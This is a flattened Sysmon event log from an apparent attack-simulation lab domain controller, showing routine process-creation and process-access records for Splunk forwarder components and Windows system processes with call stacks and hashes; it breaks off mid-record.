154100x80000000000000006362Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:14.410{D28789B6-7CEA-5FA1-5F01-000000008801}2744C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006413Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006412Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006411Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006410Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006409Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CEB-5FA1-6101-000000008801}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006408Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C62-5FA1-0B00-000000008801}8684056C:\Windows\system32\lsass.exe{D28789B6-7CEB-5FA1-6101-000000008801}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006407Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006406Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006405Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006404Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.911{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2C00-000000008801}2800C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006403Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.895{D28789B6-7CEB-5FA1-6101-000000008801}49445080C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+577205|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+576d36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+56c09|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+572d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe+8fe2c4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006402Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CEB-5FA1-6101-000000008801}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006401Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006400Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006399Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006398Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006397Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006396Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006395Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006394Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006393Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006392Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7CEB-5FA1-6101-000000008801}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006391Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7CEB-5FA1-6101-000000008801}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000006390Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.755{D28789B6-7CEB-5FA1-6101-000000008801}4944C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006389Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.238{D28789B6-7CEB-5FA1-6001-000000008801}47642612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006388Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:53:15.082{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7CEB-5FA1-6001-000000008801}4764C:\Program 